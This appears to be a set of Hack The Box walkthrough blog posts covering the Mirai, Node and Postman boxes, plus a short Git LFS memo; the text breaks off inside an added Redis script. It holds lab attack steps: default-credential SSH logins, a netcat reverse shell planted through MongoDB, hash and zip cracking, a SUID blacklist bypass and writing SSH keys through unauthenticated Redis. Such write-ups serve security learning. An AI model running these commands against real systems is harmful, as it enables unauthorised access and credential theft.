Hackthebox Mirai Walkthrough


Explanation

Hackthebox is a website that hosts a collection of vulnerable machines inside its own VPN.
This is a walkthrough of the box “Mirai”.

Solution

1. Initial Enumeration

TCP Port Scanning:

root@kali:~# nmap -p- 10.10.10.48 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-10 09:35 EEST
Nmap scan report for 10.10.10.48
Host is up (0.033s latency).
Not shown: 65529 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
|   1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
|   2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
|   256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_  256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp    open  domain  dnsmasq 2.76
| dns-nsid:
|_  bind.version: dnsmasq-2.76
80/tcp    open  http    lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
1050/tcp  open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open  http    Plex Media Server httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
|_http-title: Unauthorized
32469/tcp open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.07 seconds

Gobuster HTTP:

root@kali:~# gobuster dir -u http://10.10.10.48 -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.48
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/04/10 09:37:20 Starting gobuster
===============================================================
/admin (Status: 301)
/swfobject.js (Status: 200)
===============================================================
2020/04/10 09:37:36 Finished
===============================================================

2. Getting User

We found an admin console at http://10.10.10.48/admin/.
It is the web interface of Pi-hole, a DNS sinkhole that is normally installed on a Raspberry Pi; the dnsmasq service on port 53 fits that picture.

Raspbian ships with the default account pi:raspberry, and Pi-hole installs on a Raspberry Pi often leave it unchanged.
We can try it for the SSH login.

root@kali:~# sshpass -p raspberry ssh pi@10.10.10.48

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Apr 10 06:49:57 2020 from 10.10.14.32 

SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.


SSH is enabled and the default password for the 'pi' user has not been changed. 
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

pi@raspberrypi:~ $

Now we have a shell as the user pi.
user.txt is in the directory /home/pi/Desktop.

pi@raspberrypi:~ $ cat Desktop/user.txt 
ff837707441b257a20e32199d7c8838d

3. Getting Root

Using sudo -l, we can see that pi may run any command as root, and without a password (NOPASSWD).

pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL

Switch to root with sudo and go to /root.
root.txt is there, but it tells us the flag is not.

root@raspberrypi:~# cat root.txt 
I lost my original root.txt! I think I may have a backup on my USB stick...

Using df -h, we can find out /dev/sdb is mounted on /media/usbstick.

root@raspberrypi:~# df -h
Filesystem      Size  Used Avail Use% Mounted on
aufs            8.5G  2.8G  5.3G  34% /
tmpfs           100M  4.8M   96M   5% /run
/dev/sda1       1.3G  1.3G     0 100% /lib/live/mount/persistence/sda1
/dev/loop0      1.3G  1.3G     0 100% /lib/live/mount/rootfs/filesystem.squashfs
tmpfs           250M     0  250M   0% /lib/live/mount/overlay
/dev/sda2       8.5G  2.8G  5.3G  34% /lib/live/mount/persistence/sda2
devtmpfs         10M     0   10M   0% /dev
tmpfs           250M  8.0K  250M   1% /dev/shm
tmpfs           5.0M  4.0K  5.0M   1% /run/lock
tmpfs           250M     0  250M   0% /sys/fs/cgroup
tmpfs           250M  8.0K  250M   1% /tmp
/dev/sdb        8.7M   93K  7.9M   2% /media/usbstick
tmpfs            50M     0   50M   0% /run/user/999
tmpfs            50M     0   50M   0% /run/user/1000

Then, go to /media/usbstick.
There is an interesting file damnit.txt.

root@raspberrypi:/media/usbstick# cat damnit.txt 
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?

-James

It sounds like root.txt has already been deleted.
Deleting a file only unlinks its directory entry; the data blocks stay on the device until they are reused, and this small stick has barely been written since. Running strings on the raw block device therefore still turns up the file contents.

root@raspberrypi:~# strings /dev/sdb
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt                                                                                         
damnit.txt                                                                                       
>r &                                                                                             
3d3e483143ff12ec505d026fa13e020b                                                                 
Damnit! Sorry man I accidentally deleted your files off the USB stick.                           
Do you know if there is any way to get them back?                                                
-James
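Why strings on /dev/sdb works: rm only unlinks the inode, and the data blocks of root.txt stay on the device until something overwrites them. The script below is an added example, not code from the box or the original walkthrough. It does what strings plus a grep for a 32-hex-character flag does, over a constructed byte buffer that stands in for a raw device image (it is not a real ext filesystem, only bytes in the right shape). Passing a path as the first argument runs it against a real image instead; take a dd copy first rather than carving the live device.

```python
import re
import sys

# Constructed stand-in for a raw device image: filesystem-looking bytes, the
# directory name table, and the data block of a file that was unlinked but not
# overwritten. NOT a real ext2 image, just bytes in the right shape.
SAMPLE_IMAGE = (
    b"\x00" * 64
    + b"/media/usbstick\x00lost+found\x00root.txt\x00damnit.txt\x00"
    + b"\x00" * 32
    + b"3d3e483143ff12ec505d026fa13e020b\n"  # content of the deleted root.txt
    + b"\x00" * 16
    + b"Damnit! Sorry man I accidentally deleted your files off the USB stick.\n"
    + b"\xff" * 32
)

# A 32-hex-digit token not embedded in a longer hex run: the shape of an HTB flag.
FLAG_RE = re.compile(rb"(?<![0-9a-fA-F])[0-9a-f]{32}(?![0-9a-fA-F])")


def carve_strings(data, min_len=4):
    """Return every run of printable ASCII at least min_len bytes long, which is
    what `strings -n <min_len>` prints for the same input."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def find_flags(data):
    """Return the distinct flag-shaped tokens found anywhere in the raw bytes."""
    return sorted({m.group().decode("ascii") for m in FLAG_RE.finditer(data)})


def carve_file(path):
    """Carve a device image from disk. A USB-stick image fits in memory; for a
    large disk image you would read it in overlapping chunks instead."""
    with open(path, "rb") as fh:
        data = fh.read()
    return carve_strings(data), find_flags(data)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        strings_found, flags = carve_file(sys.argv[1])
    else:
        strings_found, flags = carve_strings(SAMPLE_IMAGE), find_flags(SAMPLE_IMAGE)
    for s in strings_found:
        print(s)
    print("flag candidates:", flags)
```

The flag regex is only a convenience for HTB; in a real recovery you would carve by file signature or use a tool such as testdisk/photorec, and you would work on a copy (dd if=/dev/sdb of=usb.img) so that the evidence is never modified.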

Hackthebox Node Walkthrough


Explanation

Hackthebox is a website that hosts a collection of vulnerable machines inside its own VPN.
This is a walkthrough of the box “Node”.

Solution

1. Initial Enumeration

TCP Port Scanning:

root@kali:~# nmap -p- 10.10.10.58 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-05 21:28 EEST
Nmap scan report for 10.10.10.58
Host is up (0.040s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
|   256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_  256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open  hadoop-datanode Apache Hadoop
| hadoop-datanode-info:
|_  Logs: /login
| hadoop-tasktracker-info:
|_  Logs: /login
|_http-title: MyPlace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 118.96 seconds

2. Getting User

A Node.js website called “MyPlace” is running on port 3000 (nmap's Hadoop guess is a misidentification; the http-title is the useful part).

Proxying the site through Burp Suite shows the front-end calling an API endpoint, “/api/users/latest”.

Requesting the endpoint directly returns the records of the users “tom”, “mark” and “rastating”, including their password hashes (64 hex characters, which looks like unsalted SHA-256).

root@kali:~# curl -s http://10.10.10.58:3000/api/users/latest | jq
[
  {
    "_id": "59a7368398aa325cc03ee51d",
    "username": "tom",
    "password": "f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240",
    "is_admin": false
  },
  {
    "_id": "59a7368e98aa325cc03ee51e",
    "username": "mark",
    "password": "de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73",
    "is_admin": false
  },
  {
    "_id": "59aa9781cced6f1d1490fce9",
    "username": "rastating",
    "password": "5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0",
    "is_admin": false
  }
]

Next, try “/api/users”.
This endpoint lists every user, including an admin account “myP14ceAdm1nAcc0uNT” with is_admin set to true.

root@kali:~# curl -s http://10.10.10.58:3000/api/users/ | jq
[
  {
    "_id": "59a7365b98aa325cc03ee51c",
    "username": "myP14ceAdm1nAcc0uNT",
    "password": "dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af",
    "is_admin": true
  },
  {
    "_id": "59a7368398aa325cc03ee51d",
    "username": "tom",
    "password": "f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240",
    "is_admin": false
  },
  {
    "_id": "59a7368e98aa325cc03ee51e",
    "username": "mark",
    "password": "de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73",
    "is_admin": false
  },
  {
    "_id": "59aa9781cced6f1d1490fce9",
    "username": "rastating",
    "password": "5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0",
    "is_admin": false
  }
]

The hashes are unsalted, so a lookup table such as Crackstation.net cracks the admin hash immediately: the password is “manchester”.
Exposing password hashes through an unauthenticated API is the real bug; unsalted, fast SHA-256 only makes it trivial to exploit.
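Why the lookup table works: the API hands out raw SHA-256 digests with no salt and no work factor, so one precomputed table, or one dictionary run, cracks every user at once. The script below is an added example, not code from the box or the original post. It runs a dictionary attack over a dump shaped like the /api/users response (the hashes are the ones shown above; the five-word list is a constructed stand-in for rockyou.txt) and then shows the salted, iterated PBKDF2 scheme the application should have used instead. sha256_hex is a small helper added for the example.

```python
import hashlib
import hmac
import os

# Constructed mini wordlist standing in for rockyou.txt.
WORDLIST = ["password", "123456", "letmein", "manchester", "qwerty"]

# The shape of the /api/users response; hashes copied from the walkthrough above.
USERS = [
    {"username": "myP14ceAdm1nAcc0uNT",
     "password": "dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af",
     "is_admin": True},
    {"username": "tom",
     "password": "f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240",
     "is_admin": False},
]


def sha256_hex(word):
    """Helper: the unsalted digest the application stores."""
    return hashlib.sha256(word.encode()).hexdigest()


def crack_sha256(target_hex, words):
    """Dictionary attack on an unsalted SHA-256 hex digest: one hash per candidate.
    Returns the matching word or None."""
    target = target_hex.lower()
    for word in words:
        if sha256_hex(word) == target:
            return word
    return None


def crack_dump(users, words):
    """Map username -> recovered password (or None) for a /api/users style dump.
    Because nothing is salted, the candidate digests are computed once per word
    even though several users are attacked."""
    table = {sha256_hex(w): w for w in words}
    return {u["username"]: table.get(u["password"].lower()) for u in users}


# --- what the application should have stored instead -------------------------
ITERATIONS = 200_000


def hash_password(password, salt=None):
    """Salted, iterated PBKDF2-HMAC-SHA256 (bcrypt/scrypt/argon2 are better still).
    A per-user random salt defeats lookup tables; the iteration count makes each
    guess cost roughly ITERATIONS hashes instead of one."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return "pbkdf2$%d$%s$%s" % (ITERATIONS, salt.hex(), dk.hex())


def verify_password(password, stored):
    _, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)  # constant-time comparison


if __name__ == "__main__":
    for user, pw in crack_dump(USERS, WORDLIST).items():
        print("%-22s %s" % (user, pw or "<not in wordlist>"))
    stored = hash_password("manchester")
    print(stored)
    print("verify:", verify_password("manchester", stored), verify_password("wrong", stored))
```

The same dump with salted hashes would force one full dictionary run per user, and with a proper work factor each guess would cost hundreds of thousands of hash operations rather than one.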

Logging in as the admin exposes a backup function (the “/api/admin/backup” route seen later in the source), which returns a file “myplace.backup” that is base64 encoded.

Decode it with the base64 command; the result is a zip archive.

root@kali:~# cat myplace.backup | base64 --decode > myplace
root@kali:~# file myplace
myplace: Zip archive data, at least v1.0 to extract

unzip prompts for a password, so brute-force it with “fcrackzip” and rockyou.txt.
The password is “magicword”.

root@kali:~# unzip myplace
Archive:  myplace
[myplace] var/www/myplace/package-lock.json password:

root@kali:~# fcrackzip -D -p /usr/share/wordlists/rockyou.txt myplace
possible pw found: magicword ()

Then unzip the archive. It contains the source code of the Node.js web application.

root@kali:~# unzip myplace
Archive:  myplace
[myplace] var/www/myplace/package-lock.json password:
  inflating: var/www/myplace/package-lock.json
  inflating: var/www/myplace/node_modules/serve-static/README.md
  inflating: var/www/myplace/node_modules/serve-static/index.js

---

Take a look at the source code.
In “/var/www/myplace/app.js”, the MongoDB connection string contains a credential for the user “mark”.

root@kali:~/var/www/myplace# cat app.js | grep mongo
const MongoClient = require('mongodb').MongoClient;
const ObjectID    = require('mongodb').ObjectID;
const url         = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
    console.log('[!] Failed to connect to mongodb');

The same password is reused for mark's SSH account.

mark:5AYRft73VtFpc84k
root@kali:~# ssh mark@10.10.10.58
mark@10.10.10.58's password: 

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.




              .-. 
        .-'``(|||) 
     ,`\ \    `-`.                 88                         88 
    /   \ '``-.   `                88                         88 
  .-.  ,       `___:      88   88  88,888,  88   88  ,88888, 88888  88   88 
 (:::) :        ___       88   88  88   88  88   88  88   88  88    88   88 
  `-`  `       ,   :      88   88  88   88  88   88  88   88  88    88   88 
    \   / ,..-`   ,       88   88  88   88  88   88  88   88  88    88   88 
     `./ /    .-.`        '88888'  '88888'  '88888'  88   88  '8888 '88888' 
        `-..-(   ) 
              `-` 




The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Wed Sep 27 02:33:14 2017 from 10.10.14.3
mark@node:~$ id
uid=1001(mark) gid=1001(mark) groups=1001(mark)

However, mark cannot read user.txt.
There are two other users on the box, tom and frank.

mark@node:/home$ ls -l
total 12
drwxr-xr-x 2 root root 4096 Aug 31  2017 frank
drwxr-xr-x 3 root root 4096 Sep  3  2017 mark
drwxr-xr-x 6 root root 4096 Sep  3  2017 tom

Looking at the process list, two Node.js applications run as the user “tom”: the web app and a scheduler.

mark@node:~$ ps aux | grep tom
tom       1211  0.0  5.8 1074616 44232 ?       Ssl  19:31   0:03 /usr/bin/node /var/scheduler/app.js
tom       1231  0.0  6.6 1024156 50068 ?       Ssl  19:31   0:04 /usr/bin/node /var/www/myplace/app.js
mark      1610  0.0  0.1  14228  1020 pts/0    S+   23:05   0:00 grep --color=auto tom

The scheduler (/var/scheduler/app.js) polls the “tasks” collection of the “scheduler” database and executes the “cmd” field of each document it finds, as tom.
Mark's MongoDB credential is also valid for that database, so we can open the MongoDB shell and insert a task containing a reverse shell command.

mark@node:~$ mongo -u mark -p 5AYRft73VtFpc84k localhost/scheduler
MongoDB shell version: 3.2.16
connecting to: localhost/scheduler
> db.tasks.insertOne( { cmd: "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|/bin/nc 10.10.14.6 4444 >/tmp/f" } );
{
        "acknowledged" : true,
        "insertedId" : ObjectId("5e8b80f878ddbff46dfcb0d7")
}
> exit
bye

Launch a netcat listener.

root@kali:~# nc -nlvp 4444
listening on [any] 4444 ...

After a minute or two (the scheduler polls the collection periodically), we get a reverse shell as user “tom”.

root@kali:~# nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.58] 38860
bash: cannot set terminal process group (1230): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

tom@node:/$ id
id
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin)

user.txt is in the directory “/home/tom”.

tom@node:/$ cd /home/tom
cd /home/tom
tom@node:~$ ls
ls
user.txt
tom@node:~$ cat user.txt
cat user.txt
e1156acc3574e04b06908ecf76be91b1

3. Getting Root

Searching for SUID binaries, we find a non-standard one, “/usr/local/bin/backup”.

tom@node:/tmp$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/local/bin/backup
/usr/bin/chfn
/usr/bin/at
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/newuidmap
/bin/ping
/bin/umount
/bin/fusermount
/bin/ping6
/bin/ntfs-3g
/bin/su
/bin/mount

The previous source, “/var/www/myplace/app.js”, also shows how this executable is invoked: with “-q”, a “backup_key” (a constant in the same file) and a directory to archive.

200   app.get('/api/admin/backup', function (req, res) {
201     if (req.session.user && req.session.user.is_admin) {
202       var proc = spawn('/usr/local/bin/backup', ['-q', backup_key, __dirname ]);
203       var backup = '';

The binary refuses paths that contain blacklisted strings such as “/root”, but it builds the zip command as a string and hands it to the shell. The check is applied to the raw argument, while the shell strips the backslashes before zip sees the path, so “/roo\t/roo\t.txt” passes the check and becomes “/root/root.txt”. The output is a base64-encoded zip protected with the same “magicword” password.

tom@node:/tmp$ /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "/roo\t/roo\t.txt" | base64 -d > /tmp/flag.zip

tom@node:/tmp$ unzip -P magicword flag.zip
unzip -P magicword flag.zip
Archive:  flag.zip
 extracting: root/root.txt

Now we have extracted root.txt.

tom@node:/tmp$ cat root/root.txt
cat root/root.txt
1722e99ca5f353b362556a62bd5e6be0
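The bug in /usr/local/bin/backup is a validate-then-interpret mismatch: the blacklist is matched against the raw argument, but the argument is then embedded in a command string for system(), where the shell strips the backslashes. The Python below is an added model of that logic and is not the binary's code (its source is not on this page, so the blacklist contents and the allowed base directory are assumptions). It shows the broken check beside the one a correct implementation would make: validate the value that will actually be used, after unescaping and normalisation, against an allowlist, and never route the path through a shell at all.

```python
import os
import shlex

# Assumed blacklist; the real binary's list is not shown on this page.
BLACKLIST = ("/root", "..")
# Assumed: the only tree the backup function is meant to archive.
ALLOWED_ROOT = "/var/www/myplace"


def naive_check_blocks(arg):
    """What the binary does: substring-match the blacklist against argv as given."""
    return any(bad in arg for bad in BLACKLIST)


def as_seen_by_zip(arg):
    """What zip receives: backup builds 'zip -r -P magicword <out> <arg>' as one
    string and runs it with system(), so the shell applies its own unescaping.
    An unquoted backslash simply drops itself and keeps the next character,
    which is why \\t becomes t here (it is not a tab)."""
    try:
        words = shlex.split(arg)  # POSIX shell word splitting and unescaping
    except ValueError:            # unbalanced quote: the shell would error out
        return ""
    return words[0] if words else ""


def hardened_check_blocks(arg, allowed_root=ALLOWED_ROOT):
    """Check the value that will be used, not the one that was typed: unescape the
    way the consumer will, normalise '..' segments, then require the result to
    stay inside an allowlisted directory. (os.path.realpath would additionally
    resolve symlinks on a live system.)"""
    target = os.path.normpath(as_seen_by_zip(arg))
    inside = target == allowed_root or target.startswith(allowed_root + "/")
    return not inside


def safe_argv(arg, out="/tmp/backup.zip"):
    """What the binary should execute instead of system(): an argv list passed
    straight to execve, so no shell ever reinterprets the argument."""
    return ["/usr/bin/zip", "-r", "-P", "magicword", out, arg]


if __name__ == "__main__":
    for candidate in ["/root/root.txt", r"/roo\t/roo\t.txt",
                      "/var/www/myplace/../../root", "/var/www/myplace/public"]:
        print("%-32s naive blocks=%-5s zip sees=%-22s hardened blocks=%s" % (
            candidate, naive_check_blocks(candidate),
            as_seen_by_zip(candidate), hardened_check_blocks(candidate)))
```

The general lesson is the same as for any blacklist in front of an interpreter: whatever sits between the check and the use (a shell, a path normaliser, a decoder) can transform the input, so the check must run on the transformed value, and the interpreter is best removed entirely.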

Memo / Enable Git Large File Storage on GitHub

Explanation

Git Large File Storage (Git LFS) is a Git extension that replaces large binary files in the repository with small text pointers and stores the file contents on a separate server.
This is a memo on enabling Git LFS for a GitHub repository.

Environment

  • OS: Kali linux 2019.4

Reference

Package installation

root@kali:~# git lfs install
Git LFS initialized.

Tracking PNG files

To track .png files, run the following command.

$ git lfs track "*.png"
Tracking "*.png"

We can confirm that a “.gitattributes” file now exists with an entry for .png files.

$ cat .gitattributes 
*.png filter=lfs diff=lfs merge=lfs -text

After that, the tracked files show up as modified and need to be committed again (along with .gitattributes).

$ git status
On branch Github-LFS
Changes not staged for commit:
  (use "git add <file>..." to update what will be committed)
  (use "git restore <file>..." to discard changes in working directory)
        modified:   public/images/2017-09-21/gcc-1.png
        modified:   public/images/2017-09-21/gcc-2.png
        modified:   public/images/2017-09-21/gcc-3.png
        modified:   public/images/2018-12-01/2018-12-05-09-49-17.png
        modified:   public/images/2018-12-01/2018-12-05-09-50-24.png

---

Then commit and push the branch.
The push output includes upload progress for the .png files, which now go to LFS storage.

$ git push origin Github-LFS

---

Enumerating objects: 761, done.0/310), 21 MB | 965 KB/s
Counting objects: 100% (761/761), done.
Delta compression using up to 8 threads
Compressing objects: 100% (376/376), done.
Writing objects: 100% (385/385), 50.71 KiB | 1.37 MiB/s, done.
Total 385 (delta 5), reused 0 (delta 0)

---

Alternatively, for files that are already committed, “git lfs migrate” rewrites history so that they are stored in LFS.

$ git lfs migrate import --include="*.png"
migrate: override changes in your working copy? [Y/n] Y
migrate: changes in your working copy will be overridden ...
migrate: Fetching remote refs: ..., done.
migrate: Sorting commits: ..., done.
migrate: Rewriting commits: 100% (2/2), done.
  master                33de649d04553205a0db99802b2b965459e284ce -> cb1533f0115d4a0caaa691b9c6eff20a73670e0a
migrate: Updating refs: ..., done.
migrate: checkout: ..., done.

Because migrate rewrites history, the old objects stay in the repository as unreachable garbage; run the following to discard them. The rewritten branch also has to be force-pushed, and anyone else with a clone must re-clone or rebase onto the new history.

$ git reflog expire --expire-unreachable=now --all
$ git gc --prune=now
Enumerating objects: 3197, done.
Counting objects: 100% (3197/3197), done.
Delta compression using up to 8 threads
Compressing objects: 100% (1526/1526), done.
Writing objects: 100% (3197/3197), done.
Total 3197 (delta 1642), reused 3197 (delta 1642)

Now we can see that our binary files are managed by Git LFS.

Hackthebox Postman Walkthrough


Explanation

Hackthebox is a website that hosts a collection of vulnerable machines inside its own VPN.
This is a walkthrough of the box “Postman”.

Solution

1. Initial Enumeration

TCP Port Scanning:

root@kali:~# nmap -p- 10.10.10.160 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-14 18:54 EET
Nmap scan report for 10.10.10.160
Host is up (0.043s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 83.81 seconds

Gobuster HTTP:

root@kali:~# gobuster dir -u http://10.10.10.160 -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.160
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/03/14 18:59:56 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/css (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
/js (Status: 301)
/server-status (Status: 403)
/upload (Status: 301)
===============================================================
2020/03/14 19:00:16 Finished
===============================================================

Redis enumeration:

Reference: https://book.hacktricks.xyz/pentesting/6379-pentesting-redis

1n4r1@kali:~$ redis-cli -h 10.10.10.160
10.10.10.160:6379> info
# Server
redis_version:4.0.9
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:9435c3c2879311f3
redis_mode:standalone
os:Linux 4.15.0-58-generic x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:7.4.0
process_id:616
run_id:521dd2981efd190099f6fdc8744a20a1b3217664
tcp_port:6379
uptime_in_seconds:444
uptime_in_days:0
hz:10
lru_clock:7323466
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf

---

10.10.10.160:6379> keys *
(empty list or set)

10.10.10.160:6379> config get *
  1) "dbfilename"
  2) "dump.rdb"
  3) "requirepass"
  4) ""
  5) "masterauth"
  6) ""
  7) "cluster-announce-ip"
  8) ""
  9) "unixsocket"

---

2. Summary

  1. Port 22: OpenSSH running
  2. Port 80: HTTP website running with Apache
  3. Port 6379: Redis 4.0.9 running (anonymous access allowed)
  4. Port 10000: Webmin httpd running

3. Getting User

Since Redis accepts connections without authentication and CONFIG SET is not disabled, we can use it both as a directory-existence oracle and, more importantly, to write files.
As you can see, setting “dir” to a non-existent directory returns “No such file or directory”.

10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis"
10.10.10.160:6379> config set dir /var/lib/redis/non-exist-directory
(error) ERR Changing directory: No such file or directory

The home directory of the redis user is /var/lib/redis (the current “dir”), and it contains a “.ssh” directory.

10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379> 

Next, upload a public key for SSH. The blank lines around the key matter: SAVE writes an RDB file with binary header and trailer bytes, and the newlines ensure the key sits on a line of its own so that sshd still parses it.

root@kali:~# (echo -e "\n\n"; cat .ssh/id_rsa.pub; echo -e "\n\n") > pubkey.txt
root@kali:~# cat pubkey.txt | redis-cli -h 10.10.10.160 -x set pubkey
OK

After that, point the dump file at “/var/lib/redis/.ssh/authorized_keys” and trigger a save.

root@kali:~# redis-cli -h 10.10.10.160
10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379> config set dbfilename "authorized_keys"
OK
10.10.10.160:6379> save
OK
10.10.10.160:6379> 
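The same exchange, with both sides of the protocol spelled out. This is an added example, not code from the box or the original post: a minimal RESP encoder (the wire format redis-cli speaks), the padding around the key and the four commands in order. plant_key sends them to a live server and is the only part that needs a network; the encoder, the padding and the reply check run offline. Host, port and the .ssh path are parameters you supply.

```python
import socket
import sys


def resp_encode(*args):
    """Encode one command as a RESP array of bulk strings, exactly what redis-cli
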